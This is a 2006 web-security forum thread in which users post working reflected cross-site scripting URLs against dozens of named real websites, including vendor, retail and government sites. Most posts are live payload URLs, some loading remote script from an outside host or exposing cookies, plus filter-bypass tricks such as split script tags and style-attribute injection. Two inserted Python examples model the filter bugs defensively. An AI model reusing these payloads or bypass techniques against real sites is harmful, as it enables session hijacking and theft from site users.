Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Current Page: 12 of 65
Re: So it begins
Posted by: thomaspollet
Date: September 29, 2006 05:31AM

I reported xss in myheadlines phpnuke module, yet it's still live on some places:

http://cccure.org/modules.php?op=modload&name=MyHeadlines&file=index&myh=user&myh_op=show_all%22%3E%3Cscript%3Ealert(2)%3C/script%3E&eid=2474

Re: So it begins
Posted by: Ghozt
Date: September 29, 2006 12:47PM

thomaspollet Wrote:
-------------------------------------------------------
> I reported xss in myheadlines phpnuke module, yet
> it's still live on some places:
>
> http://cccure.org/modules.php?op=modload&name=MyHe
> adlines&file=index&myh=user&myh_op=show_all%22%3E%
> 3Cscript%3Ealert(2)%3C/script%3E&eid=2474

That's because people have to update their nuke. The phpnuke.org search hole should have been fixed by now, because I remember being able to do the IFrame in 7.9 when it was posted on waraxe's site, and they released 8.0 (which they're using on their site) a while ago.

Edited 1 time(s). Last edit at 09/29/2006 12:48PM by Ghozt.

Re: So it begins
Posted by: Ghozt
Date: September 29, 2006 01:20PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://linksys.com/servlet/Satellite?email=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&temp_email=&passcode='';!--&tenp_passcode='';!--&fieldsOnForm=email,passcode,&mag=&submitType=done&SubmittedElement=Linksys/ProductReg/CustomerLogin&childpagename=US/Layout&packedargs=siteid%3D1115416834707%26lang%3Den%26site%3DUS%26cid%3D1115416906014%26c%3DL_Content_C1&pagename=Linksys/Common/VisitorWrapper&FormName=reg&Attachment=false - Linksys.com
http://www.thawte.com/ucgi/search.cgi?menu1=make+your+selection+%3E%3E&Search=%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.jpg+&x=3&y=5
Look at what is supposedly ignored.

Edited 2 time(s). Last edit at 09/29/2006 02:10PM by Ghozt.

Re: So it begins
Posted by: maluc
Date: September 29, 2006 02:26PM

http://www.certicom.com/index.php?keywords=asdf%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cx+&Submit=Submit&action=res%2Csearch_site

-maluc

Re: So it begins
Posted by: maluc
Date: September 29, 2006 02:31PM

http://search4.unisys.com/especific/search_results.asp?qstr=asdf%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+&totDocs=0&totFtDocs=0&qryoption=allofthewords&extension=&changeDisplay=0&qstrTemp=asdf%27e&SiteToSearch=http%3A%2F%2Fwww.unisys.com%2Fabout__unisys%2F*&section=&Search=Search&summ=detailed&docsPP=20&s=&se=&b=about__unisys&p=3&e=none&sf=corporate&ci=about__unisys&ce=company__profile

-maluc

Re: So it begins
Posted by: Ghozt
Date: September 29, 2006 02:57PM

http://app.subscribermail.com/add_mail.cfm?optinparam=redirectwelcome&ovr_redirection_url=http%3A%2F%2Fwww.trustestage.com%2Fsubconfirm.html&ppid=TRUSD6C93DDB&version=v3&email=XSS%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.jpg+&mailtype=1&Submit=Submit - TRUSTe newsletter.
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://www.truste.org/pvr.php%3fpage=complaint&PHPSESSID=3e5f80c5ff71a277bc238b19d650ad22&url=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&_submit=Next - Yet another TRUSTe.

Edited 1 time(s). Last edit at 09/29/2006 03:00PM by Ghozt.

Re: So it begins
Posted by: maluc
Date: September 29, 2006 03:42PM

I'm not sure what the web designer was thinking for this, but it doesn't filter any input.. *unless* you include <script> or </script> .. then it filters it all. But my guess is they got too many complaints from people named O'Brien showing up as O\'Brien ..

Potentially a very exploitable hole for fun and profit. _-_

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://zme.amazon.com/exec/varzea/fx-register/process-login/102-5551194-3126502&login-customer=existing&login-email=XSSman&input-login-email=%22%3E%3CBODY+ONLOAD%3D'a=%22Your%20Cookies:%5Cn%5Cn%5Cn%22%2Bdocument.cookie;alert%28a%29'%3E%3Cx%20+&input-login-customer=existing&password=&x=0&y=0 zme.amazon.com

-maluc

Re: So it begins
Posted by: maluc
Date: September 29, 2006 04:52PM

http://www.afpc.randolph.af.mil/external.asp?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

-maluc

Re: So it begins
Posted by: maluc
Date: September 29, 2006 04:58PM

http://search.access.gpo.gov/GPO/Search.asp?ct=GPO&q1=Weapons%20of%20Mass%20Destruction%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

-maluc

Re: So it begins
Posted by: maluc
Date: September 29, 2006 05:26PM

http://ohrm.os.doc.gov/search/index.htm?ssUserText=Osama+Bin+Laden%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+

-maluc

Re: So it begins
Posted by: maluc
Date: September 29, 2006 05:59PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.geeksquad.com/email/HighLevel.php&email=XSSman<script>alert(%22XSS%22)</script>&Sign+Up.x=0&Sign+Up.y=0&Sign+Up=Sign+Up geeksquad.com

-maluc

Re: So it begins
Posted by: maluc
Date: September 29, 2006 06:01PM

http://www.compusa.com/products/products.asp?N=0&Ntt=XSSman%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cx%20&Ntk=All&Nty=1&D=XSSman%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cx%20&Dx=mode%20matchall

-maluc

Re: So it begins
Posted by: maluc
Date: September 29, 2006 06:57PM

Heh, here's a funny example of when two filters work against each other. It doesn't filter out ' " > < .. they may need them for their encoded tracking numbers (the form checks your order status). Instead they filter out all <script* and </script* and go to an error page. That's easy enough to get around with a <body onload=alert()>

The second filter erases all spaces though, since tracking numbers have none. This turns the workaround into <bodyonload=alert()>. That eliminates every other vector I know of. Except, now it bypasses the first filter:
<scr ipt>alert()</scr ipt>
will now execute when spaces are removed ^^

Ironically, switching the order of the filters would be an almost effective filter (except for style="bind/expression")

http://www.newegg.com/CustomerService/TrackOrder.asp?TrackingNumber=+XSSman%22%3E%3Cscr+ipt%3Ealert%28%22XSS%22%29%3C%2Fscr+ipt%3E%3Cx&Action=NEW

-maluc

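The filter-ordering bug maluc describes above (and the "reject everything only if <script> appears" check from the zme.amazon.com post earlier in this page), written out as a small Python model. This is an added example, not Newegg's or Amazon's code and not something posted in the thread: the two filter functions, the `would_execute` oracle and the payload strings are assumptions constructed for the illustration.

```python
"""Two server-side filters composed in the wrong order, as in the Newegg post
above. Added illustration, not the site's code: the filter bodies, the oracle
and the payloads are assumptions made for the example."""
import re
from typing import Optional

SCRIPT_TAG = re.compile(r"</?script", re.IGNORECASE)


def reject_script_tags(value: str) -> Optional[str]:
    """Filter 1: the 'all or nothing' check. Any '<script' or '</script'
    sends the request to an error page (modelled as None); anything else
    passes through untouched, quotes and angle brackets included."""
    return None if SCRIPT_TAG.search(value) else value


def strip_spaces(value: str) -> str:
    """Filter 2: tracking numbers never contain whitespace, so drop all of it."""
    return re.sub(r"\s+", "", value)


def filter_then_strip(value: str) -> Optional[str]:
    """Order used by the form in the post: check for tags, THEN strip spaces.
    Stripping after checking lets '<scr ipt>' turn into '<script>'."""
    checked = reject_script_tags(value)
    return None if checked is None else strip_spaces(checked)


def strip_then_filter(value: str) -> Optional[str]:
    """The other order: normalise first, then check the normalised string.
    General rule: every check must see the final form of the input."""
    return reject_script_tags(strip_spaces(value))


def would_execute(reflected: Optional[str]) -> bool:
    """Crude oracle for a reflected string: dangerous if a real <script> tag
    or a tag carrying an event-handler attribute survives. Rejected input
    (None) never executes."""
    if reflected is None:
        return False
    has_script = re.search(r"<script\b", reflected, re.IGNORECASE)
    has_handler = re.search(r"<\w+\s+on\w+\s*=", reflected, re.IGNORECASE)
    return bool(has_script or has_handler)


PAYLOADS = {  # constructed test vectors mirroring the ones in the post
    "plain": "<script>alert(1)</script>",
    "body_onload": "<body onload=alert(1)>",
    "split_tag": "<scr ipt>alert(1)</scr ipt>",
}


def compare_orders() -> dict:
    """{payload name: (executes under filter->strip, executes under strip->filter)}."""
    return {
        name: (would_execute(filter_then_strip(p)), would_execute(strip_then_filter(p)))
        for name, p in PAYLOADS.items()
    }


if __name__ == "__main__":
    for name, (bad_order, good_order) in compare_orders().items():
        print(f"{name:12s} filter->strip executes={bad_order}  strip->filter executes={good_order}")
```

Only the split-tag payload survives, and only under the filter-then-strip order; once the space stripping runs first, the tag check sees `<script` and rejects it. The caveat in the post (a `style=expression(...)` or `-moz-binding` attribute injected into an existing tag, which needs neither a new tag nor any spaces) is deliberately not modelled by the oracle here.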
Re: So it begins
Posted by: maluc
Date: September 29, 2006 07:15PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.techpowerup.org/upload.php&MAX_FILE_SIZE=2097152&file=&url=http://asdf%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&resize=0&dx=0&dy=0&watermark=9&tagline=&font=arial&textcol=%2523000000&size=12&bgcol=%2523FFFFFF&bgalpha=20&tagpos=1 techpowerup.com .. unfiltered php error

-maluc

Re: So it begins
Posted by: Kyran
Date: September 29, 2006 07:16PM

Hah. That's quite neat actually.

- Kyran

Re: So it begins
Posted by: maluc
Date: September 29, 2006 07:33PM

http://www.frozencpu.com/process?mv_session_id=tdVJ23D9&mv_nextpage=problem&mv_form_profile=check_problem&mv_todo=return&p_fname=XSSman+for+ff%22+style%3D-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29&p_lname=XSSman+for+ie%22+style%3D%27xx%3Aexpression%28alert%28%22XSS%22%29%29%27&p_email=&p_subject=&p_category=general&p_comments=%0D%0A&mv_click_map=Send&mv_click_Send=Send

Filters by deleting the <, so I used parameter injection.

Anyone know of an injection like these two for auto-executing in Opera? It only has 1% market share.. but still nice for completion.

firefox: style=-moz-binding:url('http://ha.ckers.org/xssmoz.xml#xss')
ie: style="expression(alert('XSS'))"

-maluc
Edited 1 time(s). Last edit at 09/29/2006 07:41PM by maluc.

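Why deleting `<` is not a fix, as in the frozencpu post above: the value is reflected into an attribute of an existing tag, so the attacker only needs a `"` to close the value and can then add attributes of their own. The following is an added example, not the site's code and not code from the thread; the `<input>` template, the bracket-deleting filter and the attribute parser are assumptions made for the illustration (the two payload strings are the ones maluc posted).

```python
"""Attribute injection when the filter only deletes angle brackets, as in the
frozencpu post above. Added illustration, not the site's code: the template,
the filter and the tolerant attribute parser are assumptions."""
import html
import re

# Tolerant attribute grammar: double-quoted, single-quoted or unquoted values.
ATTR_RE = re.compile(r"""(\w[\w-]*)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""")


def strip_angle_brackets(value: str) -> str:
    """The filter the post describes: '<' (and '>') are deleted, quotes kept."""
    return value.replace("<", "").replace(">", "")


def render_naive(first_name: str) -> str:
    """Reflect p_fname into an existing tag's attribute after that filter.
    No new tag can be opened, but a '"' ends the value and what follows is
    parsed as further attributes of the same <input>."""
    return '<input name="p_fname" value="%s">' % strip_angle_brackets(first_name)


def render_escaped(first_name: str) -> str:
    """Hardened version: escape for the attribute context. html.escape with
    quote=True turns '"' into &quot; (and ' into &#x27;), so the value can
    never be closed early, whatever else the input contains."""
    return '<input name="p_fname" value="%s">' % html.escape(first_name, quote=True)


def attribute_names(tag: str) -> list:
    """Attribute names a tolerant browser would see in a single tag."""
    body = tag[tag.index(" ") + 1 : tag.rindex(">")]
    return [m.group(1).lower() for m in ATTR_RE.finditer(body)]


def injected(rendered_tag: str) -> bool:
    """True when anything beyond the template's own name/value attributes
    survived, i.e. the user now controls an attribute of the tag."""
    return attribute_names(rendered_tag) != ["name", "value"]


# The two payloads from the post: legacy Firefox XBL binding and IE expression().
PAYLOAD_FF = 'XSSman for ff" style=-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")'
PAYLOAD_IE = "XSSman for ie\" style='xx:expression(alert(\"XSS\"))'"

if __name__ == "__main__":
    for p in (PAYLOAD_FF, PAYLOAD_IE):
        print("naive  :", attribute_names(render_naive(p)))
        print("escaped:", attribute_names(render_escaped(p)))
```

With the naive rendering both payloads come out as a third `style` attribute on the `<input>`; with context-aware escaping the whole string stays inside `value="..."`. The specific sinks are dated (remote `-moz-binding` and IE's `expression()` are gone from current browsers), but the attribute-injection shape is not: an `autofocus onfocus=` pair lands in exactly the same place, so the fix is escaping for the attribute context rather than blacklisting characters.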
Re: So it begins
Posted by: digi7al64
Date: September 29, 2006 07:39PM

http://searchg.symantec.com/search?q=%22%3Balert%28%27xss%27%29%3Bs.prop5%3D%22&site=symc_en_US&btnG.x=0&btnG.y=0&btnG=OK&hitsceil=100&sort=date%3AD%3AL%3Ad1&output=xml_no_dtd&client=symc_en_US&charset=utf-8&context=gbh&y=0&oe=UTF-8&ie=UTF-8&proxystylesheet=symc_en_US&x=0

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: WhiteAcid
Date: September 29, 2006 07:46PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://odds.proboards24.com/index.cgi?action=register2&username=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E <-- any proboards forum.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: So it begins
Posted by: maluc
Date: September 29, 2006 08:02PM

Heh, Symantec.. good job

-maluc

Re: So it begins
Posted by: Ghozt
Date: September 29, 2006 08:22PM

http://www.tv/en-def-8b35e4129716/cgi-bin/multilookup.cgi?domain=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&tld=tv&x=0&y=0

Re: So it begins
Posted by: maluc
Date: September 29, 2006 08:33PM

http://knowledge.mcafee.com/SupportSite/search.do?languages=XSSman'%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20&rwTarget=%2FrfPlayerWidget.do&searchMode=GuidedSearch&searchString=&product=hhhhh&document=&cmd=search&productFamily=&contextType=gs

As far as I can see, it's an unused field, so overlooked for filtering _-_

-maluc

Re: So it begins
Posted by: maluc
Date: September 29, 2006 08:37PM

In case Symantec and McAfee were lonely: https://www.zonelabs.com/store/application?namespace=zls_user&origin=login.jsp&event=button.login&zl_user_name=XSSman%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&destination=global.jsp&zl_user_password=&x=0&y=0

-maluc

Re: So it begins
Posted by: Ghozt
Date: September 29, 2006 09:25PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://reg.imageshack.us/content.php?page=email&name=Null&email=XSS%22%3E%3Cscript%20src=http://ha.ckers.org/xss.jpg%20@null.org&subj=XML+API+Request&corresp=Partnerships&idea=Null&ip=0.0.0.0&q=marketing - imageshack.us

Re: So it begins
Posted by: digi7al64
Date: September 29, 2006 10:04PM

Nice find guys. Must be all the honeypots.

Anyways - I'm going away for a few days, so don't think I have finished just yet because I ain't posting.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: Ghozt
Date: September 29, 2006 10:07PM

I sure wish Acunetix would take down the honeypot on their main page. :(
C-ya when you get back, digital. I'm leaving for California on Monday myself.

Re: So it begins
Posted by: maluc
Date: September 29, 2006 10:09PM

http://usa.kaspersky-labs.com/trials/trialsregHOME.php?aw=Trials+Page&ref=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E%3Cx%20&chapter=146481750
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://usa.kaspersky-labs.com/trials/trials_postHOME.php&oid=00D300000000WYS&retURL=http%3A%2F%2Fusa.kaspersky-labs.com%2Ftrials%2Ftrial_thanks.php&Campaign_ID=Campaign_Adwords&aw=Trials+Page&ref=%5C&chapter=146481750&email=XSSman%22><script>alert(String.fromCharCode(88,83,83))</script>@dev.null&Submit.x=0&Submit.y=0&Submit=Submit&optin=yes also usa.kaspersky-labs.com

-maluc

Re: So it begins
Posted by: Ghozt
Date: September 29, 2006 10:11PM

http://adidas.com - adidas.com/us/shared/help/help_contact-us.asp?strCountry=us&strBrand="/>';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
http://dictionary.com - dictionary.reference.com/search?q=%22';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//%3E%3C/SCRIPT%3E!--%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=&{}&x=0&y=0

I can't get it to post right maluc, see if you can try. It cuts off at the first //\.

Edited 14 time(s). Last edit at 09/29/2006 10:46PM by Ghozt.

Re: So it begins
Posted by: XSSman
Date: September 29, 2006 10:36PM

Ghozt, you have to hex-encode some of the characters for the script here, especially " to %22

and: { to %7B .. } to %7D .. + to %2B .. I think that's all of them

-maluc

Re: So it begins
Posted by: maluc
Date: September 29, 2006 10:45PM

Disclosed by Ghozt, just click-friendly:
http://www.adidas.com/us/shared/legal.asp?strCountry=us&strBrand=%22);alert(%22XSS%22)%3C/SCRIPT%3E<x
http://dictionary.reference.com/search?q=';alert(%22XSS%22);x='&x=0&y=0

-maluc

Re: So it begins
Posted by: Ghozt
Date: September 29, 2006 10:47PM

Ah. Thanks maluc. :)
